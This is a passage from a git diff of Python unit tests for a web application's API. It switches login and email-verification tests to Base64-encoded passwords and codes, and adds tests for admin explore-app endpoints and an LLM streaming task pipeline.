TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending 
email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", 
method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", 
"invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ -322,7 +334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ 
class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating 
payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + """Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid 
token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", 
"copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": 
"Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" + assert mock_recommended_app.position == 2 + + def 
test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == 
valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py 
b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py new file mode 100644 index 0000000000..40f58c9ddf --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py @@ -0,0 +1,420 @@ +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest + +from core.app.apps.base_app_queue_manager import AppQueueManager +from core.app.entities.app_invoke_entities import ChatAppGenerateEntity +from core.app.entities.queue_entities import ( + QueueAgentMessageEvent, + QueueErrorEvent, + QueueLLMChunkEvent, + QueueMessageEndEvent, + QueueMessageFileEvent, + QueuePingEvent, +) +from core.app.entities.task_entities import ( + EasyUITaskState, + ErrorStreamResponse, + MessageEndStreamResponse, + MessageFileStreamResponse, + MessageReplaceStreamResponse, + MessageStreamResponse, + PingStreamResponse, + StreamEvent, +) +from core.app.task_pipeline.easy_ui_based_generate_task_pipeline import EasyUIBasedGenerateTaskPipeline +from core.base.tts import AppGeneratorTTSPublisher +from core.model_runtime.entities.llm_entities import LLMResult as RuntimeLLMResult +from core.model_runtime.entities.message_entities import TextPromptMessageContent +from core.ops.ops_trace_manager import TraceQueueManager +from models.model import AppMode + + +class TestEasyUIBasedGenerateTaskPipelineProcessStreamResponse: + """Test cases for EasyUIBasedGenerateTaskPipeline._process_stream_response method.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock(spec=ChatAppGenerateEntity) + entity.task_id = "test-task-id" + entity.app_id = "test-app-id" + # minimal app_config used by pipeline internals + entity.app_config = SimpleNamespace( + tenant_id="test-tenant-id", + app_id="test-app-id", + app_mode=AppMode.CHAT, + app_model_config_dict={}, + additional_features=None, + sensitive_word_avoidance=None, + ) + # 
minimal model_conf for LLMResult init + entity.model_conf = SimpleNamespace( + model="test-model", + provider_model_bundle=SimpleNamespace(model_type_instance=Mock()), + credentials={}, + ) + return entity + + @pytest.fixture + def mock_queue_manager(self): + """Create a mock queue manager.""" + manager = Mock(spec=AppQueueManager) + return manager + + @pytest.fixture + def mock_message_cycle_manager(self): + """Create a mock message cycle manager.""" + manager = Mock() + manager.get_message_event_type.return_value = StreamEvent.MESSAGE + manager.message_to_stream_response.return_value = Mock(spec=MessageStreamResponse) + manager.message_file_to_stream_response.return_value = Mock(spec=MessageFileStreamResponse) + manager.message_replace_to_stream_response.return_value = Mock(spec=MessageReplaceStreamResponse) + manager.handle_retriever_resources = Mock() + manager.handle_annotation_reply.return_value = None + return manager + + @pytest.fixture + def mock_conversation(self): + """Create a mock conversation.""" + conversation = Mock() + conversation.id = "test-conversation-id" + conversation.mode = "chat" + return conversation + + @pytest.fixture + def mock_message(self): + """Create a mock message.""" + message = Mock() + message.id = "test-message-id" + message.created_at = Mock() + message.created_at.timestamp.return_value = 1234567890 + return message + + @pytest.fixture + def mock_task_state(self): + """Create a mock task state.""" + task_state = Mock(spec=EasyUITaskState) + + # Create LLM result mock + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.prompt_messages = [] + llm_result.message = Mock() + llm_result.message.content = "" + + task_state.llm_result = llm_result + task_state.answer = "" + + return task_state + + @pytest.fixture + def pipeline( + self, + mock_application_generate_entity, + mock_queue_manager, + mock_conversation, + mock_message, + mock_message_cycle_manager, + mock_task_state, + ): + """Create an EasyUIBasedGenerateTaskPipeline 
instance with mocked dependencies.""" + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.EasyUITaskState", return_value=mock_task_state + ): + pipeline = EasyUIBasedGenerateTaskPipeline( + application_generate_entity=mock_application_generate_entity, + queue_manager=mock_queue_manager, + conversation=mock_conversation, + message=mock_message, + stream=True, + ) + pipeline._message_cycle_manager = mock_message_cycle_manager + pipeline._task_state = mock_task_state + return pipeline + + def test_get_message_event_type_called_once_when_first_llm_chunk_arrives( + self, pipeline, mock_message_cycle_manager + ): + """Expect get_message_event_type to be called when processing the first LLM chunk event.""" + # Setup a minimal LLM chunk event + chunk = Mock() + chunk.delta.message.content = "hi" + chunk.prompt_messages = [] + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + mock_message_cycle_manager.get_message_event_type.assert_called_once_with(message_id="test-message-id") + + def test_llm_chunk_event_with_text_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with text content.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Hello, world!" 
+ chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello, world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello, world!" + + def test_llm_chunk_event_with_list_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with list content.""" + # Setup + text_content = Mock(spec=TextPromptMessageContent) + text_content.data = "Hello" + + chunk = Mock() + chunk.delta.message.content = [text_content, " world!"] + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello world!" 
+ + def test_agent_message_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of agent message events.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Agent response" + + agent_message_event = Mock(spec=QueueAgentMessageEvent) + agent_message_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = agent_message_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Ensure method under assertion is a mock to track calls + pipeline._agent_message_to_stream_response = Mock(return_value=Mock()) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + # Agent messages should use _agent_message_to_stream_response + pipeline._agent_message_to_stream_response.assert_called_once_with( + answer="Agent response", message_id="test-message-id" + ) + + def test_message_end_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of message end events.""" + # Setup + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.message = Mock() + llm_result.message.content = "Final response" + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = llm_result + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert mock_task_state.llm_result == llm_result + 
pipeline._save_message.assert_called_once() + pipeline._message_end_to_stream_response.assert_called_once() + + def test_error_event(self, pipeline): + """Test handling of error events.""" + # Setup + error_event = Mock(spec=QueueErrorEvent) + error_event.error = Exception("Test error") + + mock_queue_message = Mock() + mock_queue_message.event = error_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.handle_error = Mock(return_value=Exception("Test error")) + pipeline.error_to_stream_response = Mock(return_value=Mock(spec=ErrorStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.handle_error.assert_called_once() + pipeline.error_to_stream_response.assert_called_once() + + def test_ping_event(self, pipeline): + """Test handling of ping events.""" + # Setup + ping_event = Mock(spec=QueuePingEvent) + + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.ping_stream_response.assert_called_once() + + def test_file_event(self, pipeline, mock_message_cycle_manager): + """Test handling of file events.""" + # Setup + file_event = Mock(spec=QueueMessageFileEvent) + file_event.message_file_id = "file-id" + + mock_queue_message = Mock() + mock_queue_message.event = file_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + file_response = Mock(spec=MessageFileStreamResponse) + 
mock_message_cycle_manager.message_file_to_stream_response.return_value = file_response + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert responses[0] == file_response + mock_message_cycle_manager.message_file_to_stream_response.assert_called_once_with(file_event) + + def test_publisher_is_called_with_messages(self, pipeline): + """Test that publisher publishes messages when provided.""" + # Setup + publisher = Mock(spec=AppGeneratorTTSPublisher) + + ping_event = Mock(spec=QueuePingEvent) + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + list(pipeline._process_stream_response(publisher=publisher, trace_manager=None)) + + # Assert + # Called once with message and once with None at the end + assert publisher.publish.call_count == 2 + publisher.publish.assert_any_call(mock_queue_message) + publisher.publish.assert_any_call(None) + + def test_trace_manager_passed_to_save_message(self, pipeline): + """Test that trace manager is passed to _save_message.""" + # Setup + trace_manager = Mock(spec=TraceQueueManager) + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = None + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=trace_manager)) + + # Assert + 
pipeline._save_message.assert_called_once_with(session=ANY, trace_manager=trace_manager) + + def test_multiple_events_sequence(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling multiple events in sequence.""" + # Setup + chunk1 = Mock() + chunk1.delta.message.content = "Hello" + chunk1.prompt_messages = [] + + chunk2 = Mock() + chunk2.delta.message.content = " world!" + chunk2.prompt_messages = [] + + llm_chunk_event1 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event1.chunk = chunk1 + + ping_event = Mock(spec=QueuePingEvent) + + llm_chunk_event2 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event2.chunk = chunk2 + + mock_queue_messages = [ + Mock(event=llm_chunk_event1), + Mock(event=ping_event), + Mock(event=llm_chunk_event2), + ] + pipeline.queue_manager.listen.return_value = mock_queue_messages + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 3 + assert mock_task_state.llm_result.message.content == "Hello world!" 
